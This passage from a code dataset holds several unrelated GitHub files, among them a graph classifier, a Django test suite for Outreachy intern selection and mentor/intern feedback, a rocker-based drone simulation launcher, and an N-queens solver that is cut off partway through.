'0.1'\n\nsetup(\n\tname='CoreFuncMumbles',\n\tversion=__version__,\n\tdescription=__doc__,\n\tauthor=__author__,\n\tpackages=['corefuncmumbles'],\n\tpackage_dir={'corefuncmumbles':'src'},\n\tentry_points='''\n\t[mumbles.plugins]\n\tCoreFuncMumbles = corefuncmumbles:CoreFuncMumbles\n\t'''\n)\n\n# copy egg file to plugin directory\ncopy(\"dist/CoreFuncMumbles-%s-py%d.%d.egg\" %(__version__,sys.version_info[0],sys.version_info[1]), \"../../\")\n\n\n","repo_name":"xiongchiamiov/mumbles","sub_path":"src/plugins/eggs/corefunc/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"7095136516","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"NOME\"\"\"\n\n__version__ = '1.0'\n__author__ = 'Victor Augusto'\n__copyright__ = \"Copyright (c) 2018 - Victor Augusto\"\n\nimport collections\nimport operator\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport networkx as nx\nfrom scipy.stats import entropy\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn import svm\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.naive_bayes import GaussianNB\n\nclass Classification(object):\n\t\"\"\"First line of a docstring is short and next to the quotes.\n\n\tClass and exception names are CapWords.\n\n\tClosing quotes are on their own line\n\t\"\"\"\n\n\tdef __init__(self, truth):\n\t\t\"\"\"Constructor.\"\"\"\n\t\tself.truth = truth\n\t\tself.X = [truth[0][0].tolist(), truth[1][0].tolist(), truth[2][0].tolist()]\n\t\tself.y = ['random', 'small-world', 'scale-free']\n\n\tdef __del__(self):\n\t\t\"\"\"Destructor.\"\"\"\n\t\tdel self\n\n\tdef cosine_similarity_classification(self, fv):\n\t\tprint('=============== Cosine Similarity Comparison\\n')\n\t\ter_fv, ws_fv, ba_fv = self.truth\n\n\t\tsim_er = cosine_similarity(er_fv, fv)[0][0]\n\t\tsim_ws = cosine_similarity(ws_fv, fv)[0][0]\n\t\tsim_ba = cosine_similarity(ba_fv, fv)[0][0]\n\n\t\tprint('Cosine similarity with Erdos-Renyi (Random): \\t' + str(sim_er))\n\t\tprint('Cosine similarity with Watts-Strogatz (Small-World): \\t' + str(sim_ws))\n\t\tprint('Cosine similarity with Barabasi-Albert (Scale-Free): \\t' + str(sim_ba))\n\t\tprint('\\n')\n\n\tdef classify(self, classifier, fv):\n\t\tclf = None\n\t\tif classifier == 'svm':\n\t\t\tclf = svm.SVC(gamma='scale', 
probability=True)\n\t\t\tprint(\"=============== SVM Classifier\\n\")\n\t\t\tprint(clf)\n\t\t\tprint('\\n')\n\t\t\tclf.fit(self.X, self.y)\n\n\t\tif classifier == 'random_forest':\n\t\t\tclf = RandomForestClassifier()\n\t\t\tprint(\"=============== Random Forest Classifier\\n\")\n\t\t\tprint(clf)\n\t\t\tprint('\\n')\n\t\t\tclf.fit(self.X, self.y)\n\n\t\tif classifier == 'gaussianNB':\n\t\t\tclf = GaussianNB()\n\t\t\tprint(\"=============== Gaussian Naive Bayes Classifier\\n\")\n\t\t\tprint(clf)\n\t\t\tprint('\\n')\n\t\t\tclf.fit(self.X, self.y)\n\n\t\tproba = clf.predict_proba(fv)[0]\n\t\tprediction = clf.predict(fv)[0]\n\n\t\tprint('Probability of Random Network: ' + str(proba[0]))\n\t\tprint('Probability of Small-World Network: ' + str(proba[1]))\n\t\tprint('Probability of Scale-Free Network: ' + str(proba[2]))\n\t\tprint('Predicted: ' + prediction)\n\t\tprint('\\n')","repo_name":"vaugus/stomata-complex-network-analysis","sub_path":"classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33532338246","text":"from vector.vec import Vec\nfrom matrix.mat import Mat\nfrom matrix import matutil, solver\n\n# def zero_matrix(i, j):\n# return [[0 for a in range(i)] for b in range(j)]\n\n# def zero_column_matrix(i, j):\n# return [[(a - b) for a in range(j)] for b in range(i)]\n\n# M = Mat(\n# ({'a', 'b'}, {'@', '#', '?'}),\n# {\n# ('a', '@'): 1,\n# ('a', '#'): 2,\n# ('a', '?'): 3,\n\n# ('b', '@'): 10,\n# ('b', '#'): 20,\n# ('b', '?'): 30,\n# })\n# class Mat:\n# def __init__(self, labels, function):\n# self.D = labels\n# self.f = function\n\n# def identity(D): return Mat(D, {(d, d): 1 for d in D})\n\n# def mat2rowdict(M):\n# return {r: Vec(M.D[1], {c: M[r, c] for c in M.D[1]}) for r in M.D[0]}\n\n# def mat2codict(M):\n# return {c: Vec(M.D[0], {r: M[r, c] for r in M.D[0]}) for c in M.D[1]}\n\n# 4.6.3\ndef determine_consumption():\n D = {'radio', 'sensor', 'memory', 'CPU'}\n v0 = Vec(D, {'radio': .1, 'CPU':.3})\n v1 = Vec(D, {'sensor': .2, 'CPU':.4})\n v2 = Vec(D, {'memory': .3, 'CPU':.1})\n v3 = Vec(D, {'memory': .5, 'CPU':.4})\n v4 = Vec(D, {'radio': .2, 'CPU':.5})\n\n b = Vec({0, 1, 2, 3, 4}, {0: 140.0, 1: 170.0, 2: 60.0, 3: 170.0, 4:250.0})\n A = matutil.rowdict2mat([v0, v1, v2, v3, v4])\n rate = solver.solve(A, b)","repo_name":"ftripier/Coding-The-Matrix","sub_path":"matrix/scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70150654170","text":"class Solution:\n def maxiumSumIncresingSubSequenceTabulation(self,arr):\n dp=[0]*(len(arr))\n dp[0]=arr[0]\n for i in range(1,len(arr)):\n max_=0\n for j in range(i,-1,-1):\n if arr[i]>arr[j]:\n max_=max(max_,dp[j])\n dp[i]=max_+arr[i]\n return dp\n \n \n \nsol=Solution()\narr=[10,22,9,33,21,50,41,60,80,3]\nprint(sol.maxiumSumIncresingSubSequenceTabulation(arr))\n \n \n ","repo_name":"samirpatil2000/Programs101","sub_path":"Syllabus/DynamicProgramming/AdvancedDP/2__MaxiumSumIncreasingSubsq_.py","file_name":"2__MaxiumSumIncreasingSubsq_.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"28106099836","text":"from marshmallow_jsonschema.base import JSONSchema\n\n\nclass ReactJsonSchemaFormJSONSchema(JSONSchema):\n \"\"\"\n Usage (assuming marshmallow v3):\n\n class 
MySchema(Schema):\n first_name = fields.String(\n metadata={\n 'ui:autofocus': True,\n }\n )\n last_name = fields.String()\n\n class Meta:\n react_uischema_extra = {\n 'ui:order': [\n 'first_name',\n 'last_name',\n ]\n }\n\n\n json_schema_obj = ReactJsonSchemaFormJSONSchema()\n json_schema, uischema = json_schema_obj.dump_with_uischema(MySchema())\n \"\"\"\n\n def dump_with_uischema(self, obj, many=None, *args):\n \"\"\"Runs both dump and dump_uischema\"\"\"\n dump = self.dump(obj, *args, many=many)\n uischema = self.dump_uischema(obj, *args, many=many)\n return dump, uischema\n\n def dump_uischema(self, obj, many=None, *args):\n \"\"\"\n Attempt to return something resembling a uiSchema compliant with\n react-jsonschema-form\n\n See: https://react-jsonschema-form.readthedocs.io/en/latest/form-customization/#the-uischema-object\n \"\"\"\n return dict(self._dump_uischema_iter(obj, *args, many=many))\n\n def _dump_uischema_iter(self, obj, many=None, *args):\n \"\"\"\n This is simply implementing a Dictionary Iterator for\n ReactJsonSchemaFormJSONSchema.dump_uischema\n \"\"\"\n\n for k, v in getattr(obj.Meta, \"react_uischema_extra\", {}).items():\n yield k, v\n\n for field_name, field in obj.fields.items():\n # NOTE: doubled up to maintain backwards compatibility\n metadata = field.metadata.get(\"metadata\", {})\n metadata.update(field.metadata)\n yield field_name, {k: v for k, v in metadata.items() if k.startswith(\"ui:\")}\n","repo_name":"fuhrysteve/marshmallow-jsonschema","sub_path":"marshmallow_jsonschema/extensions/react_jsonschema_form.py","file_name":"react_jsonschema_form.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":203,"dataset":"github-code","pt":"31"} +{"seq_id":"18465637482","text":"import datetime\nfrom django.core import mail\nfrom django.test import TestCase, override_settings\nfrom django.urls import reverse\nfrom reversion.models import Version\n\nfrom . 
import models\nfrom .factories import *\nfrom home import scenarios\nfrom home.email import organizers\n\n# don't try to use the static files manifest during tests\n@override_settings(STATICFILES_STORAGE='django.contrib.staticfiles.storage.StaticFilesStorage')\nclass InternSelectionTestCase(TestCase):\n def test_intern_selection_process(self):\n for phase in ('contributions_open', 'contributions_close'):\n with self.subTest(phase=phase):\n current_round = RoundPageFactory(start_from=phase)\n applicantapproval = ApplicantApprovalFactory(\n application_round=current_round,\n approval_status=models.ApprovalStatus.APPROVED,\n )\n\n project = ProjectFactory(\n project_round__participating_round=current_round,\n approval_status=models.ApprovalStatus.APPROVED,\n project_round__approval_status=models.ApprovalStatus.APPROVED,\n )\n\n finalapplication = FinalApplicationFactory(\n round=current_round, project=project, applicant=applicantapproval\n )\n\n mentorapproval = MentorApprovalFactory(\n project=project, approval_status=models.ApprovalStatus.APPROVED\n )\n\n coordinatorapproval = CoordinatorApprovalFactory(\n community=project.project_round.community,\n approval_status=models.ApprovalStatus.APPROVED,\n )\n\n organizer = ComradeFactory(account__is_staff=True).account\n\n post_params = {\n \"round_slug\": current_round.slug,\n \"community_slug\": project.project_round.community.slug,\n \"project_slug\": project.slug,\n \"applicant_username\": applicantapproval.applicant.account.username,\n }\n\n # mentor selects the intern..\n self.client.force_login(mentorapproval.mentor.account)\n path = reverse(\"select-intern\", kwargs={**post_params})\n\n legal_name = mentorapproval.mentor.public_name\n response = self.client.post(path, {\n \"rating-rating\": models.FinalApplication.AMAZING,\n \"contract-legal_name\": legal_name,\n })\n self.assertEqual(response.status_code, 302)\n\n new_relationship = models.MentorRelationship.objects.get(mentor=mentorapproval)\n intern_selection = new_relationship.intern_selection\n self.assertEqual(new_relationship.contract.legal_name, legal_name)\n self.assertEqual(intern_selection.applicant, applicantapproval)\n self.assertEqual(intern_selection.project, project)\n\n # organizer approves too early, rejected..\n self.client.force_login(organizer)\n path = reverse(\"intern-approval\", kwargs={\n **post_params,\n \"approval\": \"Approved\",\n })\n response = self.client.post(path)\n self.assertEqual(response.status_code, 403)\n intern_selection = models.InternSelection.objects.get(project=project)\n self.assertEqual(intern_selection.organizer_approved, None)\n\n # coordinator adds funding..\n self.client.force_login(coordinatorapproval.coordinator.account)\n path = reverse(\"intern-fund\", kwargs={\n **post_params,\n \"funding\": models.InternSelection.GENERAL_FUNDED,\n })\n response = self.client.post(path)\n self.assertEqual(response.status_code, 302)\n\n intern_selection = models.InternSelection.objects.get(project=project)\n self.assertEqual(intern_selection.funding_source, models.InternSelection.GENERAL_FUNDED)\n\n # organizer approves..\n self.client.force_login(organizer)\n path = reverse(\"intern-approval\", kwargs={\n **post_params,\n \"approval\": \"Approved\",\n })\n response = self.client.post(path)\n self.assertEqual(response.status_code, 302)\n\n intern_selection = models.InternSelection.objects.get(project=project)\n self.assertEqual(intern_selection.organizer_approved, True)\n\n def test_intern_selection_emails(self):\n scenario = 
scenarios.ContributionsClosedScenario()\n\n rejected_mentor = MentorApprovalFactory(\n project=scenario.project, approval_status=models.ApprovalStatus.REJECTED\n )\n withdrawn_mentor = MentorApprovalFactory(\n project=scenario.project, approval_status=models.ApprovalStatus.WITHDRAWN\n )\n approved_comentor = MentorApprovalFactory(\n project=scenario.project, approval_status=models.ApprovalStatus.APPROVED\n )\n\n post_params = {\n \"round_slug\": scenario.round.slug,\n \"community_slug\": scenario.project.project_round.community.slug,\n \"project_slug\": scenario.project.slug,\n \"applicant_username\": scenario.applicant1.applicant.account.username,\n }\n legal_name = scenario.mentor.public_name\n\n # mentor selects the intern.\n self.client.force_login(scenario.mentor.account)\n path = reverse(\"select-intern\", kwargs={**post_params})\n response = self.client.post(path, {\n \"rating-rating\": models.FinalApplication.AMAZING,\n \"contract-legal_name\": legal_name,\n })\n\n self.assertEqual(len(mail.outbox), 1)\n self.assertEqual(mail.outbox[0].subject, 'Outreachy intern selected - please sign mentoring agreement')\n self.assertEqual(mail.outbox[0].from_email, organizers)\n\n # Check important links are in the email body\n comentor_sign_up_link = reverse('select-intern', kwargs={\n 'round_slug': scenario.round.slug,\n 'community_slug': scenario.community.slug,\n 'project_slug' : scenario.project.slug,\n 'applicant_username': scenario.applicant1.applicant.account.username,\n })\n project_applicants_link = reverse('project-applicants', kwargs={\n 'round_slug': scenario.round.slug,\n 'community_slug': scenario.community.slug,\n 'project_slug' : scenario.project.slug,\n })\n self.assertIn(comentor_sign_up_link, mail.outbox[0].body)\n self.assertIn(project_applicants_link, mail.outbox[0].body)\n self.assertIn(reverse('alums'), mail.outbox[0].body)\n\n # The rejected and withdrawn mentors\n # should not get an email about the intern selection,\n # but the approved co-mentor should get an email.\n self.assertEqual(mail.outbox[0].to, [approved_comentor.mentor.email_address()])\n\n def test_mentor_can_resign(self):\n current_round = RoundPageFactory(start_from='midfeedback')\n for mentors_count in (1, 2):\n with self.subTest(mentors_count=mentors_count):\n internselection = InternSelectionFactory(\n active=True,\n mentors=mentors_count,\n round=current_round,\n )\n mentors = list(internselection.mentors.all())\n mentor = mentors.pop()\n\n path = reverse('resign-as-mentor', kwargs={\n 'round_slug': internselection.round().slug,\n 'community_slug': internselection.project.project_round.community.slug,\n 'project_slug': internselection.project.slug,\n 'applicant_username': internselection.applicant.applicant.account.username,\n })\n\n self.client.force_login(mentor.mentor.account)\n response = self.client.post(path)\n self.assertEqual(response.status_code, 302)\n\n self.assertQuerysetEqual(internselection.mentors.all(), mentors, transform=lambda x: x)\n\n @staticmethod\n def _mentor_feedback_form(internselection, **kwargs):\n defaults = {\n 'in_contact': True,\n 'asking_questions': True,\n 'active_in_public': True,\n 'provided_onboarding': True,\n 'checkin_frequency': models.InitialMentorFeedback.ONCE_WEEKLY,\n 'last_contact': internselection.initial_feedback_opens,\n 'intern_response_time': models.InitialMentorFeedback.HOURS_12,\n 'mentor_response_time': models.InitialMentorFeedback.HOURS_12,\n 'payment_approved': True,\n 'full_time_effort': True,\n 'progress_report': 'Everything is fine.',\n 
'mentors_report': 'I am very supportive',\n 'request_extension': False,\n 'extension_date': None,\n 'request_termination': False,\n 'termination_reason': '',\n }\n defaults.update(kwargs)\n return defaults\n\n def _submit_mentor_feedback_form(self, internselection, stage, answers):\n mentor = internselection.mentors.get()\n self.client.force_login(mentor.mentor.account)\n\n path = reverse(stage + '-mentor-feedback', kwargs={\n 'username': internselection.applicant.applicant.account.username,\n })\n\n return self.client.post(path, {\n # This is a dictionary comprehension that converts model-level\n # values to form/POST values. It assumes all form widgets accept\n # the str() representation of their type when the form is POSTed.\n # Values which are supposed to be unspecified can be provided as\n # None, in which case we don't POST that key at all.\n key: str(value)\n for key, value in answers.items()\n if value is not None\n })\n\n def test_mentor_can_give_initial_feedback(self):\n current_round = RoundPageFactory(start_from='initialfeedback')\n for request_extension in (False, True):\n with self.subTest(request_extension=request_extension):\n internselection = InternSelectionFactory(\n active=True,\n round=current_round,\n )\n\n extension_date = None\n if request_extension:\n extension_date = internselection.round().initialfeedback + datetime.timedelta(weeks=5)\n\n answers = self._mentor_feedback_form(internselection,\n request_extension=request_extension,\n extension_date=extension_date,\n )\n response = self._submit_mentor_feedback_form(internselection, 'initial', answers)\n self.assertEqual(response.status_code, 302)\n\n # will raise DoesNotExist if the view didn't create this\n feedback = internselection.initialmentorfeedback\n\n for key, expected in answers.items():\n self.assertEqual(getattr(feedback, key), expected)\n\n # only allow submitting once\n self.assertFalse(feedback.allow_edits)\n\n self.assertEqual(Version.objects.get_for_object(feedback).count(), 1)\n\n def test_invalid_duplicate_mentor_feedback(self):\n current_round = RoundPageFactory(start_from='initialfeedback')\n week = datetime.timedelta(weeks=1)\n disallowed_when = (\n {'allow_edits': False, 'intern_selection__initial_feedback_opens': current_round.initialfeedback - week},\n {'allow_edits': True, 'intern_selection__initial_feedback_opens': current_round.initialfeedback + week},\n )\n for params in disallowed_when:\n with self.subTest(params=params):\n prior = InitialMentorFeedbackFactory(intern_selection__round=current_round, **params)\n internselection = prior.intern_selection\n\n answers = self._mentor_feedback_form(internselection)\n response = self._submit_mentor_feedback_form(internselection, 'initial', answers)\n\n # permission denied\n self.assertEqual(response.status_code, 403)\n\n def test_mentor_can_resubmit_feedback(self):\n prior = InitialMentorFeedbackFactory(allow_edits=True)\n internselection = prior.intern_selection\n\n answers = self._mentor_feedback_form(internselection)\n response = self._submit_mentor_feedback_form(internselection, 'initial', answers)\n self.assertEqual(response.status_code, 302)\n\n # discard all cached objects and reload from database\n internselection = models.InternSelection.objects.get(pk=internselection.pk)\n\n # will raise DoesNotExist if the view destroyed this feedback\n feedback = internselection.initialmentorfeedback\n\n for key, expected in answers.items():\n self.assertEqual(getattr(feedback, key), expected)\n\n # only allow submitting once\n 
self.assertFalse(feedback.allow_edits)\n\n # we didn't create a version for the factory-generated object, so the\n # only version should be the one that the view records\n self.assertEqual(Version.objects.get_for_object(feedback).count(), 1)\n\n def test_invalid_mentor_extension_request(self):\n round = RoundPageFactory(start_from='initialfeedback')\n\n range_error = \"Extension date must be between {} and {}\".format(\n round.initialfeedback,\n round.initialfeedback + datetime.timedelta(weeks=5),\n )\n extension_deltas = (\n (None, \"If you're requesting an extension, this field is required.\"),\n (datetime.timedelta(days=-1), range_error),\n (datetime.timedelta(weeks=5, days=1), range_error),\n )\n for extension_delta, expected_error in extension_deltas:\n with self.subTest(extension_delta=extension_delta):\n internselection = InternSelectionFactory(\n active=True,\n round=round,\n )\n\n extension_date = None\n if extension_delta:\n extension_date = round.initialfeedback + extension_delta\n\n answers = self._mentor_feedback_form(internselection,\n request_extension=True,\n extension_date=extension_date,\n )\n response = self._submit_mentor_feedback_form(internselection, 'initial', answers)\n self.assertEqual(response.status_code, 200)\n\n # view should not have created a feedback object\n with self.assertRaises(models.InitialMentorFeedback.DoesNotExist):\n internselection.initialmentorfeedback\n\n self.assertFormError(response, \"form\", \"extension_date\", expected_error)\n\n @staticmethod\n def _intern_feedback_form(internselection, **kwargs):\n defaults = {\n 'in_contact': True,\n 'asking_questions': True,\n 'active_in_public': True,\n 'provided_onboarding': True,\n 'checkin_frequency': models.InitialInternFeedback.ONCE_WEEKLY,\n 'last_contact': internselection.initial_feedback_opens,\n 'intern_response_time': models.InitialInternFeedback.HOURS_12,\n 'mentor_response_time': models.InitialInternFeedback.HOURS_12,\n 'mentor_support': 'My mentor is awesome.',\n 'hours_worked': models.InitialInternFeedback.HOURS_40,\n 'time_comments': '',\n 'progress_report': 'Everything is fine.',\n 'share_mentor_feedback_with_community_coordinator': True,\n }\n defaults.update(kwargs)\n return defaults\n\n def _submit_intern_feedback_form(self, internselection, stage, answers):\n self.client.force_login(internselection.applicant.applicant.account)\n\n return self.client.post(reverse(stage + '-intern-feedback'), {\n # This is a dictionary comprehension that converts model-level\n # values to form/POST values. 
It assumes all form widgets accept\n # the str() representation of their type when the form is POSTed.\n # Values which are supposed to be unspecified can be provided as\n # None, in which case we don't POST that key at all.\n key: str(value)\n for key, value in answers.items()\n if value is not None\n })\n\n def test_intern_can_give_initial_feedback(self):\n internselection = InternSelectionFactory(\n active=True,\n round__start_from='initialfeedback',\n )\n\n answers = self._intern_feedback_form(internselection)\n response = self._submit_intern_feedback_form(internselection, 'initial', answers)\n self.assertEqual(response.status_code, 302)\n\n # will raise DoesNotExist if the view didn't create this\n feedback = internselection.initialinternfeedback\n\n for key, expected in answers.items():\n self.assertEqual(getattr(feedback, key), expected)\n\n # only allow submitting once\n self.assertFalse(feedback.allow_edits)\n\n self.assertEqual(Version.objects.get_for_object(feedback).count(), 1)\n\n @staticmethod\n def _midpoint_mentor_feedback_form(internselection, **kwargs):\n defaults = {\n 'intern_help_requests_frequency': models.MidpointMentorFeedback.MULTIPLE_WEEKLY,\n 'mentor_help_response_time': models.MidpointMentorFeedback.HOURS_6,\n 'intern_contribution_frequency': models.MidpointMentorFeedback.ONCE_WEEKLY,\n 'mentor_review_response_time': models.MidpointMentorFeedback.HOURS_3,\n 'intern_contribution_revision_time': models.MidpointMentorFeedback.DAYS_2,\n 'last_contact': internselection.midpoint_feedback_opens,\n 'payment_approved': True,\n 'full_time_effort': True,\n 'progress_report': 'Everything is fine.',\n 'mentors_report': 'I am very supportive',\n 'request_extension': False,\n 'extension_date': None,\n 'request_termination': False,\n 'termination_reason': '',\n }\n defaults.update(kwargs)\n return defaults\n\n def test_mentor_can_give_midpoint_feedback(self):\n current_round = RoundPageFactory(start_from='midfeedback')\n for request_extension in (False, True):\n with self.subTest(request_extension=request_extension):\n internselection = InternSelectionFactory(\n active=True,\n round=current_round,\n )\n\n extension_date = None\n if request_extension:\n extension_date = internselection.round().midfeedback + datetime.timedelta(weeks=5)\n\n answers = self._midpoint_mentor_feedback_form(internselection,\n request_extension=request_extension,\n extension_date=extension_date,\n )\n response = self._submit_mentor_feedback_form(internselection, 'midpoint', answers)\n self.assertEqual(response.status_code, 302)\n\n # will raise DoesNotExist if the view didn't create this\n feedback = internselection.midpointmentorfeedback\n\n for key, expected in answers.items():\n self.assertEqual(getattr(feedback, key), expected)\n\n # only allow submitting once\n self.assertFalse(feedback.allow_edits)\n\n self.assertEqual(Version.objects.get_for_object(feedback).count(), 1)\n\n def test_invalid_duplicate_midpoint_mentor_feedback(self):\n # The dates of the round don't matter because the views check the dates in the InternSelection\n current_round = RoundPageFactory(start_from='midfeedback')\n week = datetime.timedelta(weeks=1)\n disallowed_when = (\n {'allow_edits': False, 'intern_selection__midpoint_feedback_opens': current_round.midfeedback - week},\n {'allow_edits': True, 'intern_selection__midpoint_feedback_opens': current_round.midfeedback + week},\n )\n for params in disallowed_when:\n with self.subTest(params=params):\n prior = 
MidpointMentorFeedbackFactory(intern_selection__round=current_round, **params)\n internselection = prior.intern_selection\n\n answers = self._midpoint_mentor_feedback_form(internselection)\n response = self._submit_mentor_feedback_form(internselection, 'midpoint', answers)\n\n # permission denied\n self.assertEqual(response.status_code, 403)\n\n @staticmethod\n def _midpoint_intern_feedback_form(internselection, **kwargs):\n defaults = {\n 'intern_help_requests_frequency': models.MidpointInternFeedback.MULTIPLE_WEEKLY,\n 'mentor_help_response_time': models.MidpointInternFeedback.HOURS_6,\n 'intern_contribution_frequency': models.MidpointInternFeedback.ONCE_WEEKLY,\n 'mentor_review_response_time': models.MidpointInternFeedback.HOURS_3,\n 'intern_contribution_revision_time': models.MidpointInternFeedback.DAYS_2,\n 'last_contact': internselection.initial_feedback_opens,\n 'mentor_support': 'My mentor is awesome.',\n 'hours_worked': models.InitialInternFeedback.HOURS_40,\n 'time_comments': '',\n 'progress_report': 'Everything is fine.',\n 'share_mentor_feedback_with_community_coordinator': True,\n }\n defaults.update(kwargs)\n return defaults\n\n def test_intern_can_give_midpoint_feedback(self):\n internselection = InternSelectionFactory(\n active=True,\n round__start_from='midfeedback',\n )\n\n answers = self._midpoint_intern_feedback_form(internselection)\n response = self._submit_intern_feedback_form(internselection, 'midpoint', answers)\n self.assertEqual(response.status_code, 302)\n\n # will raise DoesNotExist if the view didn't create this\n feedback = internselection.midpointinternfeedback\n\n for key, expected in answers.items():\n self.assertEqual(getattr(feedback, key), expected)\n\n # only allow submitting once\n self.assertFalse(feedback.allow_edits)\n\n self.assertEqual(Version.objects.get_for_object(feedback).count(), 1)\n\n @staticmethod\n def _final_intern_feedback_form(internselection, **kwargs):\n defaults = {\n 'intern_help_requests_frequency': models.FinalInternFeedback.MULTIPLE_WEEKLY,\n 'mentor_help_response_time': models.FinalInternFeedback.HOURS_6,\n 'intern_contribution_frequency': models.FinalInternFeedback.ONCE_WEEKLY,\n 'mentor_review_response_time': models.FinalInternFeedback.HOURS_3,\n 'intern_contribution_revision_time': models.FinalInternFeedback.DAYS_2,\n 'last_contact': internselection.final_feedback_opens,\n 'mentor_support': 'My mentor is awesome.',\n 'hours_worked': models.FinalInternFeedback.HOURS_40,\n 'time_comments': '',\n 'progress_report': 'Everything is fine.',\n 'share_mentor_feedback_with_community_coordinator': True,\n 'interning_recommended': models.FinalInternFeedback.YES,\n 'recommend_intern_chat': models.FinalInternFeedback.NO_OPINION,\n 'chat_frequency': models.FinalInternFeedback.WEEK2,\n 'blog_frequency': models.FinalInternFeedback.WEEK3,\n 'blog_prompts_caused_writing': models.FinalInternFeedback.YES,\n 'blog_prompts_caused_overhead': models.FinalInternFeedback.YES,\n 'recommend_blog_prompts': models.FinalInternFeedback.YES,\n 'zulip_caused_intern_discussion': models.FinalInternFeedback.YES,\n 'zulip_caused_mentor_discussion': models.FinalInternFeedback.NO,\n 'recommend_zulip': models.FinalInternFeedback.YES,\n 'tech_industry_prep': models.FinalInternFeedback.NO,\n 'foss_confidence': models.FinalInternFeedback.YES,\n 'feedback_for_organizers': 'This was a really awesome internship!',\n }\n defaults.update(kwargs)\n return defaults\n\n def test_intern_can_give_final_feedback(self):\n internselection = InternSelectionFactory(\n 
active=True,\n round__start_from='finalfeedback',\n )\n\n answers = self._final_intern_feedback_form(internselection)\n response = self._submit_intern_feedback_form(internselection, 'final', answers)\n self.assertEqual(response.status_code, 302)\n\n # will raise DoesNotExist if the view didn't create this\n feedback = internselection.finalinternfeedback\n\n for key, expected in answers.items():\n self.assertEqual(getattr(feedback, key), expected)\n\n # only allow submitting once\n self.assertFalse(feedback.allow_edits)\n\n self.assertEqual(Version.objects.get_for_object(feedback).count(), 1)\n\n @staticmethod\n def _final_mentor_feedback_form(internselection, **kwargs):\n defaults = {\n 'intern_help_requests_frequency': models.FinalMentorFeedback.MULTIPLE_WEEKLY,\n 'mentor_help_response_time': models.FinalMentorFeedback.HOURS_6,\n 'intern_contribution_frequency': models.FinalMentorFeedback.ONCE_WEEKLY,\n 'mentor_review_response_time': models.FinalMentorFeedback.HOURS_3,\n 'intern_contribution_revision_time': models.FinalMentorFeedback.DAYS_2,\n 'last_contact': internselection.final_feedback_opens,\n 'payment_approved': True,\n 'full_time_effort': True,\n 'progress_report': 'Everything is fine.',\n 'mentors_report': 'I am very supportive',\n 'request_extension': False,\n 'extension_date': None,\n 'request_termination': False,\n 'termination_reason': '',\n 'mentoring_recommended': models.FinalMentorFeedback.NO_OPINION,\n 'blog_frequency': models.FinalMentorFeedback.NO_OPINION,\n 'blog_prompts_caused_writing': models.FinalMentorFeedback.NO_OPINION,\n 'blog_prompts_caused_overhead': models.FinalMentorFeedback.NO_OPINION,\n 'recommend_blog_prompts': models.FinalMentorFeedback.NO_OPINION,\n 'zulip_caused_intern_discussion': models.FinalMentorFeedback.NO_OPINION,\n 'zulip_caused_mentor_discussion': models.FinalMentorFeedback.NO_OPINION,\n 'recommend_zulip': models.FinalMentorFeedback.NO_OPINION,\n 'feedback_for_organizers': 'There are things you could improve but they are minor',\n }\n defaults.update(kwargs)\n return defaults\n\n def test_mentor_can_give_final_feedback(self):\n current_round = RoundPageFactory(start_from='finalfeedback')\n for request_extension in (False, True):\n with self.subTest(request_extension=request_extension):\n internselection = InternSelectionFactory(\n active=True,\n round=current_round,\n )\n\n extension_date = None\n if request_extension:\n extension_date = internselection.round().midfeedback + datetime.timedelta(weeks=5)\n\n answers = self._final_mentor_feedback_form(internselection,\n request_extension=request_extension,\n extension_date=extension_date,\n )\n response = self._submit_mentor_feedback_form(internselection, 'final', answers)\n self.assertEqual(response.status_code, 302)\n\n # will raise DoesNotExist if the view didn't create this\n feedback = internselection.finalmentorfeedback\n\n for key, expected in answers.items():\n self.assertEqual(getattr(feedback, key), expected)\n\n # only allow submitting once\n self.assertFalse(feedback.allow_edits)\n\n self.assertEqual(Version.objects.get_for_object(feedback).count(), 1)\n\n","repo_name":"sidhu08/website-1","sub_path":"home/test_internselection.py","file_name":"test_internselection.py","file_ext":"py","file_size_in_byte":28483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"32137812649","text":"import sys\n\nimport rocker\nfrom rocker.core import list_plugins\nfrom rocker.core import pull_image\nfrom rocker.core import DockerImageGenerator\n\n\ndef 
mcmillan():\n    print(\"Launching McMillan Airfield\")\n    run_drone_demo('roslaunch sitl_launcher demo.launch gui:=false sitl_world:=mcmillan')\n\ndef yosemite():\n    print(\"Launching Yosemite Valley\")\n    run_drone_demo('roslaunch sitl_launcher demo.launch gui:=false sitl_world:=yosemite')\n\n\ndef run_drone_demo(command):\n    plugins = list_plugins()\n    base_image = 'tfoote/drone_demo'\n    desired_plugins = ['nvidia', 'pulse', 'user', 'home', 'x11']\n    active_extensions = [e() for e in plugins.values() if e.get_name() in desired_plugins]\n    pull_image(base_image)\n    dig = DockerImageGenerator(active_extensions, {}, base_image)\n    if dig.build() != 0:\n        print (\"Failed to build\")\n        sys.exit(1)\n    if dig.run(command) != 0:\n        print (\"Failed to run\")\n        sys.exit(1)\n","repo_name":"osrf/px4sitl","sub_path":"src/px4sitl/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"16453689642","text":"def set_queens(idx): # the row currently being considered\n    global answer\n\n    if idx == N: # all N queens have been placed\n        answer += 1\n        return\n\n    for i in range(N): # candidate columns where a queen can be placed\n        is_able = True\n\n        for j in range(idx): # check the positions of previously placed queens\n            if i == queens[j] or abs(idx-j) == abs(i-queens[j]): # if the column or a diagonal overlaps\n                is_able = False\n                break\n\n        if is_able:\n            queens[idx] = i # place a queen in column i\n            set_queens(idx+1) # go on to place 